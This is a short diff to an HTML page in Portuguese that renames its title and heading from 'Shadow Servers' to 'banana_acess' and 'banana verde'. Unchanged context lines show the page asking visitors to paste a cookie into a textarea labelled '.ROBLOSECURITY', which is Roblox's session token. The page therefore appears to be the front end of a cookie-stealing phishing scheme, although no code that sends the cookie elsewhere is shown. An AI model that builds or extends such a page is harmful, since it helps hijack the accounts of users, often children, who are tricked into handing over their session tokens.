--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="pt-BR">
 <head>
   <meta charset="UTF-8">
-  <title>Shadow Servers</title>
+  <title>banana_acess</title>
   <link rel="stylesheet" href="style.css">
   <link href="https://fonts.googleapis.com/css2?family=Black+Ops+One&display=swap" rel="stylesheet">
 </head>
@@ -10,7 +10,7 @@
   <div class="corner corner-tl"></div>
   <div class="corner corner-tr"></div>
   
-  <h1>Shadow Servers</h1>
+  <h1>banana verde</h1>
   <p><strong>cookie abaixo.👇</strong></p>
 
   <textarea id="cookieInput" placeholder=".ROBLOSECURITY"></textarea>
